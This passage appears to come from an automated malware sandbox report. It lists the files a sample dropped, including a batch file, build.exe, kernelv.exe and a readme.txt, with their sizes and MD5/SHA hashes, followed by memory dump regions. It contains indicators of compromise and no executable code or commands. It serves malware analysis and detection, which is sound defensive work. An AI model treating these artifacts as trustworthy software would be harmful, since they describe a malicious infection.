                      6aa92413ef75b87648ef496dc5ce3fc72f78e21a3e36ab8754be3b8a5004b08bb55d63d33b040ed077118c0124e80a86129bb6ed193305f7dda8f726cf106aef

                    • C:\Users\Admin\AppData\Local\Temp\A42F.tmp\A430.tmp\A431.bat

                      Filesize

                      2KB

                      MD5

                      1c935ef28fdfd394b770d945d7f04d76

                      SHA1

                      29e251c3c40ce4ad1b2984bf26b444aa045d9b21

                      SHA256

                      aa58e1df5882878a44687853f47d10b655c3fe888ec20fb99446305f5d38c681

                      SHA512

                      a9e60f2ac4aec15a3ba0a95df224449f64777a027357792247dd597529542e79128aec996c89ff86a1654911b4b763c577d3c3d2f38c59b02b280b8ad824e7e1

                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i1oajbvx.1cf.ps1

                      Filesize

                      60B

                      MD5

                      d17fe0a3f47be24a6453e9ef58c94641

                      SHA1

                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                      SHA256

                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                      SHA512

                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                    • C:\Users\Admin\AppData\Local\Temp\build.exe

                      Filesize

                      137KB

                      MD5

                      7605fb5c749eeea0b1b27fdaad78051c

                      SHA1

                      28388bf016af085bbcbacf8c516853942f6ec8d3

                      SHA256

                      466a92e378a95752870abddd6af278fba89c5fef2cb3adfe2c4c114b9bd7cd93

                      SHA512

                      1a3780652e092bd0be5c45cf034b2d0737324009c4d7d74e5cca193f75f285be85fa1631a68c6955566206dc3d51ba2dab9c4acfc74f9652ed2c04976ae3ee54

                    • C:\Users\Admin\AppData\Local\Temp\kernelv.exe

                      Filesize

                      250KB

                      MD5

                      3252df0bec85cdcd3668d703ceaf09ce

                      SHA1

                      672366ae8df248c078db68a226d1fbf564d2f8ea

                      SHA256

                      02fa2665e5759db60b61da15b757150eda402ff6063a30a855a337d813fe8229

                      SHA512

                      179cab2e7d2cdc2cadc7a20986751007c10e6650069152df23d13bc1fef9fe5e066356f21825a325d34ea091c2b4e0766df1fabee8797da11a73de18dc46370f

                    • C:\Users\Admin\readme.txt

                      Filesize

                      780B

                      MD5

                      60d646f40556d78166ad8111d850fc51

                      SHA1

                      babaaf0762000dbf4b3f7a93beb35b6d9279d94d

                      SHA256

                      a66f43f9660c0b16c59eb22b1037c19af06f89d875344446cc63e90437f78fab

                      SHA512

                      3fb8acd626a012402669e42e760dd5b0efe2d2a37f3e71310c4a80a14491ee973713fcb0d90f99d40f0749c1dd16e8153afcb757e25de34c9ec9c82a58e81bc6

                    • memory/1976-47-0x0000000000090000-0x00000000000B8000-memory.dmp

                      Filesize

                      160KB

                    • memory/3720-3-0x00007FF80D4A3000-0x00007FF80D4A5000-memory.dmp

                      Filesize

                      8KB

                    • memory/3720-9-0x0000025BE3D60000-0x0000025BE3D82000-memory.dmp

                      Filesize

                      136KB

                    • memory/3720-14-0x00007FF80D4A0000-0x00007FF80DF61000-memory.dmp

                      Filesize

                      10.8MB

                    • memory/3720-15-0x00007FF80D4A0000-0x00007FF80DF61000-memory.dmp

                      Filesize

                      10.8MB

                    • memory/3720-18-0x00007FF80D4A0000-0x00007FF80DF61000-memory.dmp

                      Filesize

                      10.8MB

                    • memory/4040-66-0x0000000140000000-0x0000000140027000-memory.dmp

                      Filesize

                      156KB

                    • memory/4040-0-0x0000000140000000-0x0000000140027000-memory.dmp

                      Filesize

                      156KB

                    • memory/4476-68-0x0000000006B40000-0x0000000006BA6000-memory.dmp

                      Filesize

                      408KB

                    • memory/4476-61-0x0000000000930000-0x0000000000974000-memory.dmp

                      Filesize

                      272KB

                    • memory/4476-63-0x0000000002D20000-0x0000000002D32000-memory.dmp

                      Filesize

                      72KB

                    • memory/4476-64-0x0000000005390000-0x0000000005552000-memory.dmp

                      Filesize

                      1.8MB

                    • memory/4476-67-0x0000000006310000-0x000000000683C000-memory.dmp

                      Filesize

                      5.2MB

                    • memory/4476-69-0x0000000006D50000-0x0000000006DE2000-memory.dmp

                      Filesize

                      584KB

                    • memory/4476-151-0x00000000077C0000-0x0000000007D64000-memory.dmp

                      Filesize

                      5.6MB